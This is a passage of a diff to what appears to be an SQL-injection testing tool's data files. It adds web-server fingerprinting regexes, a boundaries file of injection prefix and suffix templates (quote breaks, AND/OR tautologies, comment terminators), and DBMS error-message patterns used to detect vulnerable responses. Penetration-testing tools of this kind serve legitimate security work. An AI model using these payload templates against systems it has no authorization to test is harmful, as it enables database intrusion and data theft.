+    <regexp value="Apache/2\.4\.25 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="17.04" codename="zesty"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.27 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="17.10" codename="artful"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.29 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="18.04" codename="bionic"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.34 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="18.10" codename="cosmic"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.38 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="19.04" codename="disco"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.41 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="19.10|20.04|20.10" codename="eoan|focal"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.46 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="21.04|21.10" codename="hirsute|impish"/>
+    </regexp>
+
+    <regexp value="Apache/2\.4\.52 \(Ubuntu\)">
+        <info type="Linux" distrib="Ubuntu" release="22.04" codename="jammy"/>
+    </regexp>
+
     <!-- Nginx -->
 
-    <regexp value="nginx/([\w\.]+)">
+    <regexp value="nginx$">
         <info technology="Nginx"/>
     </regexp>
+
+    <regexp value="nginx/([\w\.]+)">
+        <info technology="Nginx" tech_version="1"/>
+    </regexp>
+
+    <!-- Google Web Server -->
+
+    <regexp value="GWS$">
+        <info technology="Google Web Server"/>
+    </regexp>
+
+    <regexp value="GWS/([\w\.]+)">
+        <info technology="Google Web Server" tech_version="1"/>
+    </regexp>
+
+    <!-- lighttpd -->
+
+    <regexp value="lighttpd$">
+        <info technology="lighttpd"/>
+    </regexp>
+
+    <regexp value="lighttpd/([\w\.]+)">
+        <info technology="lighttpd" tech_version="1"/>
+    </regexp>
+
+    <!-- OpenResty -->
+
+    <regexp value="openresty$">
+        <info technology="OpenResty"/>
+    </regexp>
+
+    <regexp value="openresty/([\w\.]+)">
+        <info technology="OpenResty" tech_version="1"/>
+    </regexp>
+
+    <!-- LiteSpeed -->
+
+    <regexp value="LiteSpeed$">
+        <info technology="LiteSpeed"/>
+    </regexp>
+
+    <regexp value="LiteSpeed/([\w\.]+)">
+        <info technology="LiteSpeed" tech_version="1"/>
+    </regexp>
+
+    <!-- Sun ONE -->
+
+    <regexp value="Sun-ONE-Web-Server/([\w\.]+)">
+        <info technology="Sun ONE" tech_version="1"/>
+    </regexp>
 </root>

data/xml/banner/servlet-engine.xml

@@ -3,10 +3,18 @@
 <!-- Reference: http://www.http-stats.com/Servlet-Engine -->
 
 <root>
-    <regexp value="Tomcat( Web Server)*\/([\d\.]+)">
+    <regexp value="Tomcat( Web Server)?\/([\d\.]+)">
         <info technology="Tomcat" tech_version="1"/>
     </regexp>
 
+    <regexp value="Enhydra Application Server/([\d\.]+)">
+        <info technology="Enhydra" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Jetty/([\d\.]+)">
+        <info technology="Jetty" tech_version="1"/>
+    </regexp>
+
     <regexp value="JSP[\-\_\/\ ]([\d\.]+)">
         <info technology="JSP" tech_version="1"/>
     </regexp>

data/xml/banner/set-cookie.xml

@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+     References:
+     * http://www.http-stats.com/Set-Cookie2
+     * http://www.owasp.org/index.php/Category:OWASP_Cookies_Database
+-->
+
+<root>
+    <regexp value="ASPSESSIONID">
+        <info technology="ASP" type="Windows"/>
+    </regexp>
+
+    <regexp value="ASP\.NET_SessionId|\.ASPXAUTH">
+        <info technology="ASP.NET" type="Windows"/>
+    </regexp>
+
+    <regexp value="JSESSIONID">
+        <info technology="JSP"/>
+    </regexp>
+
+    <regexp value="JServSessionId">
+        <info technology="JServ"/>
+    </regexp>
+
+    <regexp value="Ltpatoken">
+        <info technology="WebSphere"/>
+    </regexp>
+
+    <regexp value="PHPSESS">
+        <info technology="PHP"/>
+    </regexp>
+
+    <regexp value="RoxenUserID">
+        <info technology="Roxen"/>
+    </regexp>
+
+    <regexp value="wiki\d+_session">
+        <info technology="MediaWiki"/>
+    </regexp>
+
+    <regexp value="Apache">
+        <info technology="Apache"/>
+    </regexp>
+
+    <regexp value="DomAuthSessID">
+        <info technology="Domino|Notes"/>
+    </regexp>
+
+    <regexp value="CFID|CFTOKEN|CFMAGIC|CFGLOBALS">
+        <info technology="ColdFusion"/>
+    </regexp>
+
+    <regexp value="WebLogicSession">
+        <info technology="WebLogic"/>
+    </regexp>
+
+    <regexp value="MoodleSession">
+        <info technology="Moodle"/>
+    </regexp>
+
+    <regexp value="\bwp_">
+        <info technology="WordPress"/>
+    </regexp>
+</root>

data/xml/banner/x-powered-by.xml

@@ -0,0 +1,65 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!-- Reference: https://publicwww.com/popular/powered/index.html -->
+
+<root>
+    <regexp value="PHP[\-\_\/\ ]([\d\.]+)">
+        <info technology="PHP" tech_version="1"/>
+    </regexp>
+
+    <regexp value="JSP[\-\_\/\ ]([\d\.]+)">
+        <info technology="JSP" tech_version="1"/>
+    </regexp>
+
+    <regexp value="ASP[\/\d\.]*$">
+        <info technology="ASP" type="Windows"/>
+    </regexp>
+
+    <regexp value="EasyEngine ([\d\.]+)">
+        <info technology="EasyEngine" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Phusion Passenger ([\d\.]+)">
+        <info technology="Phusion Passenger" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Craft CMS">
+        <info technology="Craft CMS"/>
+    </regexp>
+
+    <regexp value="Express">
+        <info technology="Express"/>
+    </regexp>
+
+    <regexp value="WP Engine">
+        <info technology="WP Engine"/>
+    </regexp>
+
+    <regexp value="PleskLin">
+        <info technology="Plesk" type="Linux"/>
+    </regexp>
+
+    <regexp value="PleskWin">
+        <info technology="Plesk" type="Windows"/>
+    </regexp>
+
+    <regexp value="ThinkPHP">
+        <info technology="ThinkPHP"/>
+    </regexp>
+
+    <regexp value="ASP\.NET">
+        <info technology="ASP.NET" type="Windows"/>
+    </regexp>
+
+    <regexp value="Tomcat[\-\_\/\ ]?([\d\.]+)">
+        <info technology="Tomcat" tech_version="1"/>
+    </regexp>
+
+    <regexp value="JBoss[\-\_\/\ ]?([\d\.]+)">
+        <info technology="JBoss" tech_version="1"/>
+    </regexp>
+
+    <regexp value="Servlet[\-\_\/\ ]?([\d\.]+)">
+        <info technology="Servlet" tech_version="1"/>
+    </regexp>
+</root>

data/xml/boundaries.xml

@@ -0,0 +1,576 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<!--
+Tag: <boundary>
+    How to prepend and append to the test ' <payload><comment> ' string.
+
+    Sub-tag: <level>
+        From which level check for this test.
+
+        Valid values:
+            1: Always (<100 requests)
+            2: Try a bit harder (100-200 requests)
+            3: Good number of requests (200-500 requests)
+            4: Extensive test (500-1000 requests)
+            5: You have plenty of time (>1000 requests)
+
+    Sub-tag: <clause>
+        In which clause the payload can work.
+
+        NOTE: for instance, there are some payload that do not have to be
+        tested as soon as it has been identified whether or not the
+        injection is within a WHERE clause condition.
+
+        Valid values:
+            0: Always
+            1: WHERE / HAVING
+            2: GROUP BY
+            3: ORDER BY
+            4: LIMIT
+            5: OFFSET
+            6: TOP
+            7: Table name
+            8: Column name
+            9: Pre-WHERE (non-query)
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <where>
+        Where to add our '<prefix> <payload><comment> <suffix>' string.
+
+        Valid values:
+            1: When the value of <test>'s <where> is 1.
+            2: When the value of <test>'s <where> is 2.
+            3: When the value of <test>'s <where> is 3.
+
+        A comma separated list of these values is also possible.
+
+    Sub-tag: <ptype>
+        What is the parameter value type.
+
+        Valid values:
+            1: Unescaped numeric
+            2: Single quoted string
+            3: LIKE single quoted string
+            4: Double quoted string
+            5: LIKE double quoted string
+            6: Identifier (e.g. column name)
+
+    Sub-tag: <prefix>
+        A string to prepend to the payload.
+
+    Sub-tag: <suffix>
+        A string to append to the payload.
+
+Formats:
+    <boundary>
+        <level></level>
+        <clause></clause>
+        <where></where>
+        <ptype></ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+-->
+
+<root>
+    <!-- Generic boundaries -->
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1,2,3</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+    <!-- End of generic boundaries -->
+
+    <!-- WHERE/HAVING clause boundaries -->
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)</prefix>
+        <suffix> AND ([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>))</prefix>
+        <suffix> AND (([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)))</prefix>
+        <suffix> AND ((([RANDNUM]=[RANDNUM]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>0</clause>
+        <where>1,2,3</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix></suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix> AND '[RANDSTR]'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')</prefix>
+        <suffix> AND ('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'))</prefix>
+        <suffix> AND (('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>')))</prefix>
+        <suffix> AND ((('[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>%'</prefix>
+        <suffix> AND '[RANDSTR]%'='[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>3</ptype>
+        <prefix>'</prefix>
+        <suffix> AND '[RANDSTR]' LIKE '[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>2</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]"="[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")</prefix>
+        <suffix> AND ("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"))</prefix>
+        <suffix> AND (("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>")))</prefix>
+        <suffix> AND ((("[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>5</ptype>
+        <prefix>"</prefix>
+        <suffix> AND "[RANDSTR]" LIKE "[RANDSTR]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>1</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix></prefix>
+        <suffix># [RANDSTR]</suffix>
+    </boundary>
+
+    <!--     e.g. admin' AND [INFERENCE] OR 'foo'='bar' AND password=$password -->
+    <boundary>
+        <level>3</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>'</prefix>
+        <suffix> OR '[RANDSTR1]'='[RANDSTR2]</suffix>
+    </boundary>
+    <!-- End of WHERE/HAVING clause boundaries -->
+
+    <!-- Pre-WHERE generic boundaries (e.g. "UPDATE table SET '$_REQUEST["name"]' WHERE id=1" or "INSERT INTO table VALUES('$_REQUEST["value"]') WHERE id=1)"-->
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>") WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>" WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>9</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix> WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>'+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+'</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)||</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>9</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)+</suffix>
+    </boundary>
+    <!-- End of pre-WHERE generic boundaries -->
+
+    <!-- Pre-WHERE derived table boundaries - e.g. "SELECT * FROM (SELECT column FROM table WHERE column LIKE '%$_REQUEST["name"]%') AS t1"-->
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>)) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>2</ptype>
+        <prefix>') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>4</ptype>
+        <prefix>") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1,2</where>
+        <ptype>1</ptype>
+        <prefix>) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>` WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>1</ptype>
+        <prefix>`) WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>[GENERIC_SQL_COMMENT]</suffix>
+    </boundary>
+    <!-- End of pre-WHERE derived table boundaries -->
+
+    <!-- Escaped column name (e.g. SELECT `...` FROM table) boundaries -->
+    <boundary>
+        <level>4</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>`=`[ORIGINAL]`</prefix>
+        <suffix> AND `[ORIGINAL]`=`[ORIGINAL]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>"="[ORIGINAL]"</prefix>
+        <suffix> AND "[ORIGINAL]"="[ORIGINAL]</suffix>
+    </boundary>
+
+    <boundary>
+        <level>5</level>
+        <clause>8</clause>
+        <where>1</where>
+        <ptype>6</ptype>
+        <prefix>]-(SELECT 0 WHERE [RANDNUM]=[RANDNUM]</prefix>
+        <suffix>)|[[ORIGINAL]</suffix>
+    </boundary>
+    <!-- End of escaped column name boundaries -->
+
+    <boundary>
+        <level>5</level>
+        <clause>7</clause>
+        <where>1</where>
+        <ptype>3</ptype>
+        <prefix> [RANDSTR1],</prefix>
+        <suffix> [RANDSTR2]</suffix>
+    </boundary>
+
+    <!-- AGAINST boolean full-text search boundaries (http://dev.mysql.com/doc/refman/5.5/en/fulltext-boolean.html) -->
+    <boundary>
+        <level>4</level>
+        <clause>1</clause>
+        <where>1</where>
+        <ptype>2</ptype>
+        <prefix>' IN BOOLEAN MODE)</prefix>
+        <suffix>#</suffix>
+    </boundary>
+    <!-- End of AGAINST boolean full-text search boundaries -->
+</root>

data/xml/errors.xml

@@ -0,0 +1,240 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <dbms value="MySQL">
+        <error regexp="SQL syntax.*?MySQL"/>
+        <error regexp="Warning.*?\Wmysqli?_"/>
+        <error regexp="MySQLSyntaxErrorException"/>
+        <error regexp="valid MySQL result"/>
+        <error regexp="check the manual that (corresponds to|fits) your MySQL server version"/>
+        <error regexp="check the manual that (corresponds to|fits) your MariaDB server version" fork="MariaDB"/>
+        <error regexp="check the manual that (corresponds to|fits) your Drizzle server version" fork="Drizzle"/>
+        <error regexp="Unknown column '[^ ]+' in 'field list'"/>
+        <error regexp="MySqlClient\."/>
+        <error regexp="com\.mysql\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Mysqli_Exception"/>
+        <error regexp="Pdo[./_\\]Mysql"/>
+        <error regexp="MySqlException"/>
+        <error regexp="SQLSTATE\[\d+\]: Syntax error or access violation"/>
+        <error regexp="MemSQL does not support this type of query" fork="MemSQL"/>
+        <error regexp="is not supported by MemSQL" fork="MemSQL"/>
+        <error regexp="unsupported nested scalar subselect" fork="MemSQL"/>
+    </dbms>
+
+    <dbms value="PostgreSQL">
+        <error regexp="PostgreSQL.*?ERROR"/>
+        <error regexp="Warning.*?\Wpg_"/>
+        <error regexp="valid PostgreSQL result"/>
+        <error regexp="Npgsql\."/>
+        <error regexp="PG::SyntaxError:"/>
+        <error regexp="org\.postgresql\.util\.PSQLException"/>
+        <error regexp="ERROR:\s\ssyntax error at or near"/>
+        <error regexp="ERROR: parser: parse error at or near"/>
+        <error regexp="PostgreSQL query failed"/>
+        <error regexp="org\.postgresql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Pgsql"/>
+        <error regexp="PSQLException"/>
+    </dbms>
+
+    <dbms value="Microsoft SQL Server">
+        <error regexp="Driver.*? SQL[\-\_\ ]*Server"/>
+        <error regexp="OLE DB.*? SQL Server"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+Driver"/>
+        <error regexp="Warning.*?\W(mssql|sqlsrv)_"/>
+        <error regexp="\bSQL Server[^&lt;&quot;]+[0-9a-fA-F]{8}"/>
+        <error regexp="System\.Data\.SqlClient\.(SqlException|SqlConnection\.OnError)"/>
+        <error regexp="(?s)Exception.*?\bRoadhouse\.Cms\."/>
+        <error regexp="Microsoft SQL Native Client error '[0-9a-fA-F]{8}"/>
+        <error regexp="\[SQL Server\]"/>
+        <error regexp="ODBC SQL Server Driver"/>
+        <error regexp="ODBC Driver \d+ for SQL Server"/>
+        <error regexp="SQLServer JDBC Driver"/>
+        <error regexp="com\.jnetdirect\.jsql"/>
+        <error regexp="macromedia\.jdbc\.sqlserver"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Sqlsrv_Exception"/>
+        <error regexp="com\.microsoft\.sqlserver\.jdbc"/>
+        <error regexp="Pdo[./_\\](Mssql|SqlSrv)"/>
+        <error regexp="SQL(Srv|Server)Exception"/>
+        <error regexp="Unclosed quotation mark after the character string"/>
+    </dbms>
+
+    <dbms value="Microsoft Access">
+        <error regexp="Microsoft Access (\d+ )?Driver"/>
+        <error regexp="JET Database Engine"/>
+        <error regexp="Access Database Engine"/>
+        <error regexp="ODBC Microsoft Access"/>
+        <error regexp="Syntax error \(missing operator\) in query expression"/>
+    </dbms>
+
+    <dbms value="Oracle">
+        <error regexp="\bORA-\d{5}"/>
+        <error regexp="Oracle error"/>
+        <error regexp="Oracle.*?Driver"/>
+        <error regexp="Warning.*?\W(oci|ora)_"/>
+        <error regexp="quoted string not properly terminated"/>
+        <error regexp="SQL command not properly ended"/>
+        <error regexp="macromedia\.jdbc\.oracle"/>
+        <error regexp="oracle\.jdbc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Oracle_Exception"/>
+        <error regexp="Pdo[./_\\](Oracle|OCI)"/>
+        <error regexp="OracleException"/>
+    </dbms>
+
+    <dbms value="IBM DB2">
+        <error regexp="CLI Driver.*?DB2"/>
+        <error regexp="DB2 SQL error"/>
+        <error regexp="\bdb2_\w+\("/>
+        <error regexp="SQLCODE[=:\d, -]+SQLSTATE"/>
+        <error regexp="com\.ibm\.db2\.jcc"/>
+        <error regexp="Zend_Db_(Adapter|Statement)_Db2_Exception"/>
+        <error regexp="Pdo[./_\\]Ibm"/>
+        <error regexp="DB2Exception"/>
+        <error regexp="ibm_db_dbi\.ProgrammingError"/>
+    </dbms>
+
+    <dbms value="Informix">
+        <error regexp="Warning.*?\Wifx_"/>
+        <error regexp="Exception.*?Informix"/>
+        <error regexp="Informix ODBC Driver"/>
+        <error regexp="ODBC Informix driver"/>
+        <error regexp="com\.informix\.jdbc"/>
+        <error regexp="weblogic\.jdbc\.informix"/>
+        <error regexp="Pdo[./_\\]Informix"/>
+        <error regexp="IfxException"/>
+    </dbms>
+
+    <!-- Interbase/Firebird -->
+    <dbms value="Firebird">
+        <error regexp="Dynamic SQL Error"/>
+        <error regexp="Warning.*?\Wibase_"/>
+        <error regexp="org\.firebirdsql\.jdbc"/>
+        <error regexp="Pdo[./_\\]Firebird"/>
+    </dbms>
+
+    <dbms value="SQLite">
+        <error regexp="SQLite/JDBCDriver"/>
+        <error regexp="SQLite\.Exception"/>
+        <error regexp="(Microsoft|System)\.Data\.SQLite\.SQLiteException"/>
+        <error regexp="Warning.*?\W(sqlite_|SQLite3::)"/>
+        <error regexp="\[SQLITE_ERROR\]"/>
+        <error regexp="SQLite error \d+:"/>
+        <error regexp="sqlite3.OperationalError:"/>
+        <error regexp="SQLite3::SQLException"/>
+        <error regexp="org\.sqlite\.JDBC"/>
+        <error regexp="Pdo[./_\\]Sqlite"/>
+        <error regexp="SQLiteException"/>
+    </dbms>
+
+    <dbms value="SAP MaxDB">
+        <error regexp="SQL error.*?POS([0-9]+)"/>
+        <error regexp="Warning.*?\Wmaxdb_"/>
+        <error regexp="DriverSapDB"/>
+        <error regexp="-3014.*?Invalid end of SQL statement"/>
+        <error regexp="com\.sap\.dbtech\.jdbc"/>
+        <error regexp="\[-3008\].*?: Invalid keyword or missing delimiter"/>
+    </dbms>
+
+    <dbms value="Sybase">
+        <error regexp="Warning.*?\Wsybase_"/>
+        <error regexp="Sybase message"/>
+        <error regexp="Sybase.*?Server message"/>
+        <error regexp="SybSQLException"/>
+        <error regexp="Sybase\.Data\.AseClient"/>
+        <error regexp="com\.sybase\.jdbc"/>
+    </dbms>
+
+    <dbms value="Ingres">
+        <error regexp="Warning.*?\Wingres_"/>
+        <error regexp="Ingres SQLSTATE"/>
+        <error regexp="Ingres\W.*?Driver"/>
+        <error regexp="com\.ingres\.gcf\.jdbc"/>
+    </dbms>
+
+    <dbms value="FrontBase">
+        <error regexp="Exception (condition )?\d+\. Transaction rollback"/>
+        <error regexp="com\.frontbase\.jdbc"/>
+        <error regexp="Syntax error 1. Missing"/>
+        <error regexp="(Semantic|Syntax) error [1-4]\d{2}\."/>
+    </dbms>
+
+    <dbms value="HSQLDB">
+        <error regexp="Unexpected end of command in statement \["/>
+        <error regexp="Unexpected token.*?in statement \["/>
+        <error regexp="org\.hsqldb\.jdbc"/>
+    </dbms>
+
+    <dbms value="H2">
+        <error regexp="org\.h2\.jdbc"/>
+        <error regexp="\[42000-192\]"/>
+    </dbms>
+
+    <dbms value="MonetDB">
